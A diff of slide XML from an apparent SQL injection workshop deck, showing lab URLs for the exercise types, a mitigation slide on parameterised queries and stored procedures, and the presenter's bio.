-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>| In Band       | sqli.uid0.sh/ib     |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>| Blind SQLi    | sqli.uid0.sh/blind  |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>| Out of Band   | sqli.uid0.sh/oob    |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>| ¯\_(</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>ツ</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>)_/¯   | sqli.uid0.sh/leet   |</a:t>
-            </a:r>
-            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-                <a:ea typeface="DejaVu Sans"/>
-              </a:rPr>
-              <a:t>+-------------------------------------+</a:t>
+              <a:t>Mitigation of SQLi</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="CustomShape 2"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4663440" y="1280160"/>
+            <a:ext cx="2694960" cy="330840"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Parameterised Queries!</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="118" name="CustomShape 3"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4846320" y="3566160"/>
+            <a:ext cx="4480200" cy="330840"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>Stored Procedures!</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="119" name="CustomShape 4"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1920240" y="2011680"/>
+            <a:ext cx="9052200" cy="571680"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>run_query(‘select username, password from users where id = ?’, $username)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="120" name="CustomShape 5"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2052720" y="2714760"/>
+            <a:ext cx="8229600" cy="571680"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>run_query(‘select username, password from users where id = :id:’, $id)</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="121" name="CustomShape 6"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3749040" y="4206240"/>
+            <a:ext cx="4845960" cy="571680"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+              </a:rPr>
+              <a:t>run_query(‘exec sp_get_user’, @username)</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -3601,33 +3734,14 @@
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="19" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="20" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -3650,14 +3764,14 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="112" name="CustomShape 1"/>
+          <p:cNvPr id="122" name="CustomShape 1"/>
           <p:cNvSpPr/>
           <p:nvPr/>
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="3769560" y="493200"/>
-            <a:ext cx="3838320" cy="364320"/>
+            <a:off x="4511160" y="3051360"/>
+            <a:ext cx="3502440" cy="363960"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3674,7 +3788,9 @@
           <a:fontRef idx="minor"/>
         </p:style>
         <p:txBody>
-          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000"/>
+          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
           <a:p>
             <a:pPr>
               <a:lnSpc>
@@ -3689,7 +3805,7 @@
                 <a:latin typeface="Inconsolata"/>
                 <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
-              <a:t>select solutions from workshops;</a:t>
+              <a:t>select beer from frontbar;</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -3699,33 +3815,336 @@
       </p:sp>
     </p:spTree>
   </p:cSld>
-  <p:timing>
-    <p:tnLst>
-      <p:par>
-        <p:cTn id="21" dur="indefinite" restart="never" nodeType="tmRoot">
-          <p:childTnLst>
-            <p:seq>
-              <p:cTn id="22" dur="indefinite" nodeType="mainSeq"/>
-              <p:prevCondLst>
-                <p:cond delay="0" evt="onPrev">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:prevCondLst>
-              <p:nextCondLst>
-                <p:cond delay="0" evt="onNext">
-                  <p:tgtEl>
-                    <p:sldTgt/>
-                  </p:tgtEl>
-                </p:cond>
-              </p:nextCondLst>
-            </p:seq>
-          </p:childTnLst>
-        </p:cTn>
-      </p:par>
-    </p:tnLst>
-  </p:timing>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide12.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="123" name="CustomShape 1"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3375720" y="1951920"/>
+            <a:ext cx="4747680" cy="2558520"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>select workshop, url from workshops;</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>+---------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Home.           | sqli.uid0.sh/       |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| In Band         | sqli.uid0.sh/ib     |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Bool Blind SQLi | sqli.uid0.sh/bblind |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| Time Blind SQLi | sqli.uid0.sh/tblind |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>| ¯\_(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>ツ</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>)_/¯     | sqli.uid0.sh/leet   |</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>+---------------------------------------+</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="124" name="CustomShape 1"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="3769560" y="493200"/>
+            <a:ext cx="3837960" cy="363960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="0"/>
+          <a:fillRef idx="0"/>
+          <a:effectRef idx="0"/>
+          <a:fontRef idx="minor"/>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr wrap="none" lIns="90000" rIns="90000" tIns="45000" bIns="45000">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:p>
+            <a:pPr>
+              <a:lnSpc>
+                <a:spcPct val="100000"/>
+              </a:lnSpc>
+            </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>select solutions from workshops;</a:t>
+            </a:r>
+            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
+              <a:latin typeface="Arial"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <mc:AlternateContent>
+    <mc:Choice Requires="p14">
+      <p:transition spd="slow" p14:dur="2000"/>
+    </mc:Choice>
+    <mc:Fallback>
+      <p:transition spd="slow"/>
+    </mc:Fallback>
+  </mc:AlternateContent>
 </p:sld>
 </file>
 
@@ -3755,7 +4174,7 @@
         <p:spPr>
           <a:xfrm>
             <a:off x="328680" y="534240"/>
-            <a:ext cx="11465280" cy="6132960"/>
+            <a:ext cx="11464920" cy="6132600"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3790,8 +4209,9 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Not really through space and time… just over from Adelaide.</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>$ whoami</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -3825,6 +4245,7 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
               </a:rPr>
               <a:t>@vortexau – vortex.id.au</a:t>
             </a:r>
@@ -3841,6 +4262,16 @@
                 <a:spcPts val="1001"/>
               </a:spcBef>
             </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Perpetual Noob.</a:t>
+            </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
@@ -3860,8 +4291,9 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Perpetual Noob.</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>Adelaide SecTalks co-organizer.</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
@@ -3876,6 +4308,16 @@
                 <a:spcPts val="1001"/>
               </a:spcBef>
             </a:pPr>
+            <a:r>
+              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
+                <a:solidFill>
+                  <a:srgbClr val="00ff00"/>
+                </a:solidFill>
+                <a:latin typeface="Inconsolata"/>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>9–5: Pentester @ DXC Security.</a:t>
+            </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
               <a:latin typeface="Arial"/>
             </a:endParaRPr>
@@ -3895,102 +4337,11 @@
                   <a:srgbClr val="00ff00"/>
                 </a:solidFill>
                 <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Adelaide SecTalks organizer.</a:t>
+                <a:ea typeface="DejaVu Sans"/>
+              </a:rPr>
+              <a:t>8–12: Bug Bounty Hunter.</a:t>
             </a:r>
             <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1001"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-              <a:latin typeface="Arial"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:lnSpc>
-                <a:spcPct val="90000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="1001"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
-                <a:solidFill>
-                  <a:srgbClr val="00ff00"/>
-                </a:solidFill>
-                <a:latin typeface="Inconsolata"/>
-              </a:rPr>
-              <a:t>Pentester @ DXC Security, based in Adelaide.</a:t>
-            </a:r>
